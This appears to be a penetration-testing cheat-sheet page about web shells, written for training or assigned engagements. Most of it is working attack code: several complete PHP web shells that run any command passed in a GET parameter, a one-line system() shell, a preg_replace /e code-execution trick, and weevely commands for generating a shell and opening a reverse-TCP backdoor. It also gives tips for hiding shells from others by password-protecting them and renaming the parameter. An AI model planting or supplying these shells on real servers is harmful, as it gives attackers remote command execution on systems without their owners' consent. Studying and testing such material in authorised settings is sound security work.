Web shell ¶

A web shell is a shell that is usually accessed from a browser. When possible, we want to use it as a foothold to move to reverse shell.

The language used in the web shell is determined by the language the target web server understand, such as PHP, JavaScript, or .NET. ✨

For JavaScript, you need to find a way for the website to execute your web shell. For PHP, visit the web shell URL.

⚠️ Password protect your webshells during assignments and/or randomize the parameter name (e.g., don't use cmd).

On Kali, you can use the preinstalled web shells in wordlists, or install and use SecLists webshells.

$ ls /usr/share/webshells
$ ls /usr/share/seclists/Web-Shells/
$ ls /usr/share/laudanum/ # edit and add the client (you?) IP

You may use the web shell to pop a reverse shell. Some payloads may not work smoothly according to the target configuration. Try:

bash -c "<reverse shell payload here>"

PHP web shells are PHP files such as webshell.php. Once uploaded on the target, you can execute them by browsing them with a browser.

Most web shells below are using GET to take to command to run. For instance, [...]/webshell.php?cmd=id to run the id command.

Most commands below are complex to handle redirections, multi-line results, default command, etc. You can always get by using simple payloads like <?=system($_GET[0]??true);?> and using ?0=whoami.

PHP — shell_exec ¶

This is a compacted web shell with shell_exec (doc).

<?="<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>"; ?>

You may replace ?= with ?php echo if not supported.

PHP — weevely3 ¶

This is a web shell using weevely3 (3.2k ⭐).

# generate a webshell.php protected by "password"
$ weevely generate <password> webshell.php
# connect to the web shell
$ weevely URL/webshell.php <password>
# see help
# ex: create a reverse shell
$ :backdoor_reversetcp IP PORT

PHP — phpbash ¶

You can use the semi-interactive phpbash (0.9k ⭐, 2018 🪦).

PHP — wwwolf ¶

You can use the semi-interactive wwwolf web shell (0.6k ⭐, 2017 🪦).

PHP — p0wny ¶

You can use the semi-interactive p0wny web shell (2.1k ⭐).

PHP — preg_replace ¶

In PHP < 7.0.0, we could execute PHP code in preg_replace for each match found (since PHP 5.5, there is a deprecation warning).

<?php
echo preg_replace('/a/e', 'system("whoami");', 'a');

PHP — exec ¶

This is a web shell using exec (doc)

<?php
$output = "";
exec(($_GET["cmd"] ?? "whoami")." 2>&1", $output);
echo "<pre>".implode('<br>', $output)."</pre>";
?>

PHP — passthru ¶

This is a web shell using passthru (doc)

echo "<pre>";
echo passthru(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";

PHP — system ¶

This is a web shell using system (doc)

<?php
echo "<pre>";
echo system(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>

PHP — LD_PRELOAD ¶

Refer to PHP mail() and putenv() bypass.

C# — Antak ¶

You can find antak.aspx here (8.7k ⭐).

• wso-webshell
• jspbrowser
• webwrap
• IBM Websphere Application Server (article, system:manager war)
• Axis2 aar